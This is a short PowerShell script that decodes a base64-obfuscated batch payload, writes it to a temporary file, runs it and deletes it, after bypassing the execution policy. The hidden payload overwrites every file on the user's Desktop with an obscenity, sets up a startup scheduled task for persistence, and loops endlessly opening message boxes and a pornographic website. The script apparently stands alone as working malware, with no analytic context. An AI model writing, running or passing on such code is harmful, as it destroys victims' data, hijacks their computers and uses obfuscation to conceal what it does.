powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Bruno\Desktop\Testo1.bat" 
$Base64 = "Y21kIC9jIHBvd2Vyc2hlbGwgLU5vcCAtTm9uSSAtTm9sb2dvIC1XaW5kb3dTdHlsZSBIaWRkZW4gIldyaXRlLUhvc3QiDQpAZWNobyBvZmYgDQpmb3IgJSVBIGluICgiJVVTRVJQUk9GSUxFJVxEZXNrdG9wXCoiKSBkbyAoDQogICAgcmVuICIlJUEiICIlJX5uQS50eHQiDQogICAgZWNobyBGVUNLRVIgPiAiJVVTRVJQUk9GSUxFJVxEZXNrdG9wXCUlfm5BLnR4dCINCikNCnNjaHRhc2tzIC9jcmVhdGUgL3RuICJNeVRhc2siIC90ciAiJTAiIC9zYyBPTlNUQVJUDQo6bG9vcCANCmVjaG8gbXNnYm94ICJCYWxscyIgPiAldGVtcCVcdG1wLnZicw0Kc3RhcnQgJXRlbXAlXHRtcC52YnMNCmV4cGxvcmVyICJodHRwczovL3d3dy5wb3JuaHViLmNvbSINCmdvdG8gbG9vcA0K" 
$DecodedBytes = [System.Convert]::FromBase64String($Base64) 
$DecodedString = [System.Text.Encoding]::UTF8.GetString($DecodedBytes) 
$TempFile = [System.IO.Path]::GetTempFileName() + ".bat" 
[System.IO.File]::WriteAllText($TempFile, $DecodedString) 
cmd /c $TempFile 
Remove-Item $TempFile 
